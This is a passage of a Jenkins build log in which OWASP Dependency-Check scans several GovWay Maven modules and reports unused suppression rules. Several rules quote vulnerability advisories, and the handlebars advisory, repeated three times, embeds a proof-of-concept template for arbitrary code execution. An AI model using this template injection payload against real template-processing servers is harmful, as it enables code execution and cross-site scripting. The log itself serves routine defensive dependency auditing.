[]) 17:41:24 [INFO] 17:41:24 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.log --- 17:41:24 [INFO] 17:41:24 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.log --- 17:41:24 [INFO] Executing tasks 17:41:24 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/log/slf4j-api-2.0.17.jar 17:41:24 [INFO] Executed tasks 17:41:24 [INFO] 17:41:24 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.log --- 17:41:24 [INFO] Executing tasks 17:41:29 [INFO] Executed tasks 17:41:29 [INFO] 17:41:29 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.log --- 17:41:29 [INFO] Checking for updates 17:41:29 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:41:29 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:41:29 [INFO] Check for updates complete (71 ms) 17:41:29 [INFO] 17:41:29 17:41:29 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:41:29 17:41:29 17:41:29 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:41:29 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:41:29 17:41:29 17:41:29 [INFO] Analysis Started 17:41:29 [INFO] Finished Archive Analyzer (0 seconds) 17:41:29 [INFO] Finished File Name Analyzer (0 seconds) 17:41:29 [INFO] Finished Jar Analyzer (0 seconds) 17:41:29 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:41:29 [INFO] Finished Hint Analyzer (0 seconds) 17:41:29 [INFO] Finished Version Filter Analyzer (0 seconds) 17:41:31 [INFO] Created CPE Index (1 seconds) 17:41:31 [INFO] Finished CPE Analyzer (1 seconds) 17:41:31 [INFO] Finished False Positive Analyzer (0 seconds) 17:41:31 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:41:31 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:41:31 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:41:31 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:41:31 [INFO] Suppression Rule had zero matches: SuppressionRule{filePath=PropertyType{value=.*swagger-codegen-cli-3.0.46-gov4j-1.jar.*, regex=true, caseSensitive=false},cvssBelow={10.0,}} 17:41:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=A prototype pollution vulnerability in handlebars is exploitable if an attacker can control the template, regex=false, caseSensitive=false},}} 17:41:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Denial of service, regex=false, caseSensitive=false},}} 17:41:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Prototype pollution, regex=false, caseSensitive=false},}} 17:41:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Disallow calling helperMissing and blockHelperMissing directly, regex=false, caseSensitive=false},}} 17:41:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1495, regex=false, caseSensitive=false},}} 17:41:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1633, regex=false, caseSensitive=false},}} 17:41:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service. 17:41:31 17:41:31 17:41:31 ## Recommendation 17:41:31 17:41:31 Upgrade to version 4.4.5 or later., regex=false, caseSensitive=false},}} 17:41:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates, regex=false, caseSensitive=false},}} 17:41:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting). 17:41:31 17:41:31 The following template can be used to demonstrate the vulnerability: 17:41:31 ```{{#with "constructor"}} 17:41:31 {{#with split as |a|}} 17:41:31 {{pop (push "alert('Vulnerable Handlebars JS');")}} 17:41:31 {{#with (concat (lookup join (slice 0 1)))}} 17:41:31 {{#each (slice 2 3)}} 17:41:31 {{#with (apply 0 a)}} 17:41:31 {{.}} 17:41:31 {{/with}} 17:41:31 {{/each}} 17:41:31 {{/with}} 17:41:31 {{/with}} 17:41:31 {{/with}}``` 17:41:31 17:41:31 17:41:31 ## Recommendation 17:41:31 17:41:31 Upgrade to version 3.0.8, 4.5.2 or later., regex=false, caseSensitive=false},}} 17:41:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting), regex=false, caseSensitive=false},}} 17:41:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 162, regex=false, caseSensitive=false},}} 17:41:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 11974, regex=false, caseSensitive=false},}} 17:41:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/xerces/xercesImpl@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=CVE-2017-10355, regex=false, caseSensitive=false},}} 17:41:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-core@.*$, regex=true, caseSensitive=false},cve={CVE-2025-48976,}} 17:41:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-jakarta@.*$, regex=true, caseSensitive=false},cpe={PropertyType{value=cpe:/a:apache:commons_fileupload, regex=false, caseSensitive=false},}} 17:41:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2025-15599,}} 17:41:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2026-0540,}} 17:41:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:41:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox-io@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:41:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2016-2175,}} 17:41:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-8036,}} 17:41:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-11797,}} 17:41:31 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:41:31 [INFO] Analysis Complete (1 seconds) 17:41:31 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.xml 17:41:31 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.html 17:41:31 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.json 17:41:31 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.csv 17:41:31 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.sarif 17:41:31 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-jenkins.html 17:41:31 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-junit.xml 17:41:31 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-gitlab.json 17:41:31 [INFO] 17:41:31 [INFO] ---------------< org.openspcoop2:org.openspcoop2.lucene >--------------- 17:41:31 [INFO] Building dependencies.lucene 1.0 [19/67] 17:41:31 [INFO] from mvn/dependencies/lucene/pom.xml 17:41:31 [INFO] --------------------------------[ pom ]--------------------------------- 17:41:31 [INFO] 17:41:31 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.lucene --- 17:41:31 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/lucene (includes = [*.jar], excludes = []) 17:41:31 [INFO] 17:41:31 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.lucene --- 17:41:31 [INFO] 17:41:31 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.lucene --- 17:41:31 [INFO] Executing tasks 17:41:36 [INFO] Executed tasks 17:41:36 [INFO] 17:41:36 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.lucene --- 17:41:36 [INFO] Checking for updates 17:41:36 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:41:36 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:41:36 [INFO] Check for updates complete (77 ms) 17:41:36 [INFO] 17:41:36 17:41:36 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:41:36 17:41:36 17:41:36 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:41:36 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:41:36 17:41:36 17:41:36 [INFO] Analysis Started 17:41:37 [INFO] Finished Archive Analyzer (0 seconds) 17:41:37 [INFO] Finished File Name Analyzer (0 seconds) 17:41:37 [INFO] Finished Jar Analyzer (0 seconds) 17:41:37 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:41:37 [INFO] Finished Hint Analyzer (0 seconds) 17:41:37 [INFO] Finished Version Filter Analyzer (0 seconds) 17:41:38 [INFO] Created CPE Index (1 seconds) 17:41:38 [INFO] Finished CPE Analyzer (1 seconds) 17:41:38 [INFO] Finished False Positive Analyzer (0 seconds) 17:41:38 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:41:38 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:41:38 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:41:38 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:41:38 [INFO] Suppression Rule had zero matches: SuppressionRule{filePath=PropertyType{value=.*swagger-codegen-cli-3.0.46-gov4j-1.jar.*, regex=true, caseSensitive=false},cvssBelow={10.0,}} 17:41:38 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=A prototype pollution vulnerability in handlebars is exploitable if an attacker can control the template, regex=false, caseSensitive=false},}} 17:41:38 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Denial of service, regex=false, caseSensitive=false},}} 17:41:38 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Prototype pollution, regex=false, caseSensitive=false},}} 17:41:38 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Disallow calling helperMissing and blockHelperMissing directly, regex=false, caseSensitive=false},}} 17:41:38 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1495, regex=false, caseSensitive=false},}} 17:41:38 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1633, regex=false, caseSensitive=false},}} 17:41:38 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service. 17:41:38 17:41:38 17:41:38 ## Recommendation 17:41:38 17:41:38 Upgrade to version 4.4.5 or later., regex=false, caseSensitive=false},}} 17:41:38 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates, regex=false, caseSensitive=false},}} 17:41:38 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting). 17:41:38 17:41:38 The following template can be used to demonstrate the vulnerability: 17:41:38 ```{{#with "constructor"}} 17:41:38 {{#with split as |a|}} 17:41:38 {{pop (push "alert('Vulnerable Handlebars JS');")}} 17:41:38 {{#with (concat (lookup join (slice 0 1)))}} 17:41:38 {{#each (slice 2 3)}} 17:41:38 {{#with (apply 0 a)}} 17:41:38 {{.}} 17:41:38 {{/with}} 17:41:38 {{/each}} 17:41:38 {{/with}} 17:41:38 {{/with}} 17:41:38 {{/with}}``` 17:41:38 17:41:38 17:41:38 ## Recommendation 17:41:38 17:41:38 Upgrade to version 3.0.8, 4.5.2 or later., regex=false, caseSensitive=false},}} 17:41:38 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting), regex=false, caseSensitive=false},}} 17:41:38 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 162, regex=false, caseSensitive=false},}} 17:41:38 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 11974, regex=false, caseSensitive=false},}} 17:41:38 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/xerces/xercesImpl@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=CVE-2017-10355, regex=false, caseSensitive=false},}} 17:41:38 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-core@.*$, regex=true, caseSensitive=false},cve={CVE-2025-48976,}} 17:41:38 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-jakarta@.*$, regex=true, caseSensitive=false},cpe={PropertyType{value=cpe:/a:apache:commons_fileupload, regex=false, caseSensitive=false},}} 17:41:38 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2025-15599,}} 17:41:38 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2026-0540,}} 17:41:38 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:41:38 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox-io@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:41:38 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2016-2175,}} 17:41:38 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-8036,}} 17:41:38 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-11797,}} 17:41:38 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:41:38 [INFO] Analysis Complete (1 seconds) 17:41:38 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.xml 17:41:38 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.html 17:41:38 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.json 17:41:38 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.csv 17:41:38 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.sarif 17:41:38 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-jenkins.html 17:41:38 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-junit.xml 17:41:38 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-gitlab.json 17:41:38 [INFO] 17:41:38 [INFO] -------------< org.openspcoop2:org.openspcoop2.openapi4j >-------------- 17:41:38 [INFO] Building dependencies.openapi4j 1.0 [20/67] 17:41:38 [INFO] from mvn/dependencies/openapi4j/pom.xml 17:41:38 [INFO] --------------------------------[ pom ]--------------------------------- 17:41:38 [INFO] 17:41:38 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.openapi4j --- 17:41:38 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/openapi4j (includes = [*.jar], excludes = []) 17:41:38 [INFO] 17:41:38 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.openapi4j --- 17:41:38 [INFO] 17:41:38 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.openapi4j --- 17:41:38 [INFO] Executing tasks 17:41:38 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/openapi4j/openapi-core-1.0.7.jar 17:41:38 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/openapi4j/openapi-parser-1.0.7.jar 17:41:38 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/openapi4j/openapi-schema-validator-1.0.7.jar 17:41:38 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/openapi4j/openapi-operation-validator-1.0.7.jar 17:41:38 [INFO] Executed tasks 17:41:38 [INFO] 17:41:38 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.openapi4j --- 17:41:38 [INFO] Executing tasks 17:41:43 [INFO] Executed tasks 17:41:43 [INFO] 17:41:43 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.openapi4j --- 17:41:43 [INFO] Checking for updates 17:41:43 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:41:43 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:41:44 [INFO] Check for updates complete (68 ms) 17:41:44 [INFO] 17:41:44 17:41:44 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:41:44 17:41:44 17:41:44 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:41:44 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:41:44 17:41:44 17:41:44 [INFO] Analysis Started 17:41:44 [INFO] Finished Archive Analyzer (0 seconds) 17:41:44 [INFO] Finished File Name Analyzer (0 seconds) 17:41:44 [INFO] Finished Jar Analyzer (0 seconds) 17:41:44 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:41:44 [INFO] Finished Hint Analyzer (0 seconds) 17:41:44 [INFO] Finished Version Filter Analyzer (0 seconds) 17:41:45 [INFO] Created CPE Index (1 seconds) 17:41:45 [INFO] Finished CPE Analyzer (1 seconds) 17:41:45 [INFO] Finished False Positive Analyzer (0 seconds) 17:41:45 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:41:45 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:41:45 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:41:45 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:41:45 [INFO] Suppression Rule had zero matches: SuppressionRule{filePath=PropertyType{value=.*swagger-codegen-cli-3.0.46-gov4j-1.jar.*, regex=true, caseSensitive=false},cvssBelow={10.0,}} 17:41:45 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=A prototype pollution vulnerability in handlebars is exploitable if an attacker can control the template, regex=false, caseSensitive=false},}} 17:41:45 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Denial of service, regex=false, caseSensitive=false},}} 17:41:45 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Prototype pollution, regex=false, caseSensitive=false},}} 17:41:45 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Disallow calling helperMissing and blockHelperMissing directly, regex=false, caseSensitive=false},}} 17:41:45 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1495, regex=false, caseSensitive=false},}} 17:41:45 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1633, regex=false, caseSensitive=false},}} 17:41:45 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service. 17:41:45 17:41:45 17:41:45 ## Recommendation 17:41:45 17:41:45 Upgrade to version 4.4.5 or later., regex=false, caseSensitive=false},}} 17:41:45 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates, regex=false, caseSensitive=false},}} 17:41:45 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting). 17:41:45 17:41:45 The following template can be used to demonstrate the vulnerability: 17:41:45 ```{{#with "constructor"}} 17:41:45 {{#with split as |a|}} 17:41:45 {{pop (push "alert('Vulnerable Handlebars JS');")}} 17:41:45 {{#with (concat (lookup join (slice 0 1)))}} 17:41:45 {{#each (slice 2 3)}} 17:41:45 {{#with (apply 0 a)}} 17:41:45 {{.}} 17:41:45 {{/with}} 17:41:45 {{/each}} 17:41:45 {{/with}} 17:41:45 {{/with}} 17:41:45 {{/with}}``` 17:41:45 17:41:45 17:41:45 ## Recommendation 17:41:45 17:41:45 Upgrade to version 3.0.8, 4.5.2 or later., regex=false, caseSensitive=false},}} 17:41:45 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting), regex=false, caseSensitive=false},}} 17:41:45 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 162, regex=false, caseSensitive=false},}} 17:41:45 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 11974, regex=false, caseSensitive=false},}} 17:41:45 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/xerces/xercesImpl@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=CVE-2017-10355, regex=false, caseSensitive=false},}} 17:41:45 [INFO] 